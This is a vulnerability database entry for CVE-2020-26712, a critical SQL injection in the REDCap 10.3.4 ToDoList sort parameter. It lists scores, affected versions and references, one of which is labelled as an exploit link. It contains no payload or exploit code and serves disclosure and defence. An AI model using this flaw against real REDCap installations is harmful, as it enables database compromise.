CVE-2020-26712
CRITICALREDCap 10.3.4 - SQL Injection via ToDoList Sort Parameter
Title source: llmDescription
REDCap 10.3.4 contains a SQL injection vulnerability in the ToDoList function via sort parameter. The application uses the addition of a string of information from the submitted user that is not validated well in the database query, resulting in an SQL injection vulnerability where an attacker can exploit and compromise all databases.
References (3)
Core 3
Core References
Release Notes, Vendor Advisory x_refsource_misc
https://www.evms.edu/research/resources_services/redcap/redcap_change_log/
Product, Vendor Advisory x_refsource_misc
https://www.project-redcap.org/
Exploit, Third Party Advisory x_refsource_misc
https://github.com/vuongdq54/RedCap
Scores
CVSS v3
9.8
EPSS
0.0211
EPSS Percentile
79.5%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details
CWE
CWE-89
Status
published
Products (2)
vanderbilt/redcap
10.0.20
vanderbilt/redcap
10.3.4
Published
Jan 12, 2021
Tracked Since
Feb 18, 2026